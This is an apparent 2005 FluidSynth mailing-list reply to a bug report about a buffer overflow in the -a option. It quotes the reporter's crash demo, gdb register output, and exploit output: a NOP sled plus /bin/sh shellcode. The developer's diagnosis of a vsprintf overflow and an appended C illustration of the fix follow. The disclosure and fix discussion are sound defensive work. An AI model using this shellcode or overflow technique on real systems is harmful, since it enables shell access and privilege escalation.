Re: [fluid-dev] Bug Report: -a overflow
From: Josh Green
Subject: Re: [fluid-dev] Bug Report: -a overflow
Date: Wed, 09 Feb 2005 00:00:11 -0800
On Mon, 2005-02-07 at 18:07 +0100, Axioplase wrote:
> fluidsynth can be exploited through an overflow when passing an argument
> to the "-a" option.
> See attached bug report.
>
> Though there isn't a big risk that fluidsynth is suid root, that's a bug
> anyway...
>
> Axioplase.
>
> plain text document attachment (BugReport)
> $ uname -a 17:55
> FreeBSD XXX.YYY 5.3-RELEASE FreeBSD 5.3-RELEASE #0: Fri Nov 5 04:19:18 UTC
> 2004 address@hidden:/usr/obj/usr/src/sys/GENERIC i386
> $ fluidsynth --version 17:55
> fluidsynth 1.0.3
>
> $fluidsynth -a `perl -e 'print "A"x500'`
> segmentation fault (core dumped) fluidsynth -a `perl -e 'print "A"x500'`
>
> $gdb -core fluidsynth.core
> GNU gdb 6.1.1 [FreeBSD]
> Copyright 2004 Free Software
> Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and you are
> welcome to change it and/or distribute copies of it under certain conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB. Type "show warranty" for details.
> This GDB was configured as "i386-marcel-freebsd".
> Core was generated by `fluidsynth'.
> Program terminated with signal 11, Segmentation fault.
> #0 0x41414141 in ?? ()
> (gdb) info reg
> eax 0x41414141 1094795585
> ecx 0x0 0
> edx 0x280c623e 671900222
> ebx 0x280c56a4 671897252
> esp 0xbfbfe6cc 0xbfbfe6cc
> ebp 0x280c5020 0x280c5020
> esi 0x1 1
> edi 0x280c6020 671899680
> eip 0x41414141 0x41414141
> eflags 0x10292 66194
> cs 0x1f 31
> ss 0x2f 47
> ds 0x2f 47
> es 0x2f 47
> fs 0x2f 47
> gs 0x97 151
>
>
>
> $ fluidsynth -a `./expl.pl 578 0`
> using adress 0xbfbfeb50
> using exploit
> \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x17\x5e\x31\xc0\x50\x88\x
> 46\x07\x89\x46\x08\x89\xf7\xb0\x08\x01\xc7\x57\x56\xb0\x3b\x50\xcd\x80\xe8\xe4\x
> ff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x90\x90\x90\x50\xeb\xbf\xbf\x50\xeb\x
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
> bf\xbf
>
> $ echo exploit worked > r00ted
Thanks for reporting this. I hope there aren't any people that are
running FluidSynth SUID root where security is a concern :)
Looks like it's a problem with a static error buffer which is 512 bytes.
FluidSynth is trying to tell you it couldn't find a driver by that name
(500 'A's) using vsprintf on the static buffer. I was tempted to just
stick vsnprintf in there instead to limit the max length of error
output, but then recalled that this function might not be available on
all platforms. Can anyone confirm or deny this for platforms other than
Linux? (Windows and Mac OS X in particular).
Best regards,
Josh Green
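The pattern Josh describes, a "driver not found" message formatted with vsprintf into a static 512-byte buffer, next to the vsnprintf fix, as an added example that is not FluidSynth's code. The function names, the buffer name, the message wording in DRIVER_ERR_FMT and the helper names are assumptions for illustration; the 512-byte size comes from the reply and the 500-'A' argument from the report. The vulnerable variant is kept behind a length check so the program runs without reproducing the crash; the gdb dump above (eip = 0x41414141) is what happens when that check is absent.

```c
/* Added example, not FluidSynth's code: vsprintf into a static 512-byte
 * error buffer (the bug) beside the vsnprintf fix. Names, the message
 * wording and the helpers are assumptions made for this illustration. */
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LOG_BUF_SIZE 512   /* size of the static error buffer, from the reply */
/* Assumed wording: 42 bytes of prefix before the driver name. */
#define DRIVER_ERR_FMT "Couldn't find the requested audio driver: %s"

static char log_buf[LOG_BUF_SIZE];   /* the static error buffer */

/* Vulnerable variant: vsprintf has no length bound, so the %s argument
 * (the -a driver name) is copied in full. 500 'A's plus the 42-byte prefix
 * is 542 bytes, which runs past the 512-byte buffer into whatever follows. */
static const char *log_vsprintf(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsprintf(log_buf, fmt, ap);          /* the bug: unbounded write */
    va_end(ap);
    return log_buf;
}

/* Fixed variant: vsnprintf writes at most sizeof log_buf bytes and always
 * NUL-terminates (C99 semantics). Long messages are truncated, not spilled. */
static const char *log_vsnprintf(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(log_buf, sizeof log_buf, fmt, ap);
    va_end(ap);
    return log_buf;
}

/* Constructed input: the reporter's argument, n copies of 'A'. Caller frees. */
static char *make_payload(size_t n)
{
    char *p = malloc(n + 1);
    if (p == NULL) abort();
    memset(p, 'A', n);
    p[n] = '\0';
    return p;
}

/* Bytes the formatted message needs without the NUL (C99 size-0 probe). */
static size_t needed_len(const char *driver_name)
{
    int n = snprintf(NULL, 0, DRIVER_ERR_FMT, driver_name);
    return n < 0 ? 0 : (size_t)n;
}

/* 1 if formatting a name of n 'A's with vsprintf would overflow log_buf
 * (message plus terminator does not fit). */
static int would_overflow(size_t n)
{
    char *name = make_payload(n);
    int r = needed_len(name) + 1 > (size_t)LOG_BUF_SIZE;
    free(name);
    return r;
}

/* Length of the message the fixed logger produces for n 'A's: grows with n
 * until it is pinned at LOG_BUF_SIZE - 1. */
static size_t safe_len(size_t n)
{
    char *name = make_payload(n);
    size_t len = strlen(log_vsnprintf(DRIVER_ERR_FMT, name));
    free(name);
    return len;
}

/* Same for the vulnerable logger. With an n that would overflow this is the
 * crash from the report (undefined behaviour), so it refuses and returns 0
 * instead of corrupting memory. */
static size_t unsafe_len(size_t n)
{
    char *name;
    size_t len;
    if (would_overflow(n)) return 0;
    name = make_payload(n);
    len = strlen(log_vsprintf(DRIVER_ERR_FMT, name));
    free(name);
    return len;
}

int main(void)
{
    size_t lens[] = { 4, 469, 470, 500 };
    size_t i;
    for (i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        printf("%3zu 'A's: vsprintf would overflow=%d, vsnprintf message length=%zu\n",
               lens[i], would_overflow(lens[i]), safe_len(lens[i]));
    }
    return 0;
}
```

With the assumed 42-byte prefix the break-even point is a 469-character name: 470 'A's already needs 513 bytes with the terminator. On the portability question, vsnprintf has been standard since C99 and is present in glibc, the BSD libcs and Darwin; the one historical trap is MSVC's `_vsnprintf`, which on truncation returned -1 and did not NUL-terminate, so a wrapper that forces `buf[size - 1] = '\0'` after the call is the usual belt-and-braces where that compiler has to be supported.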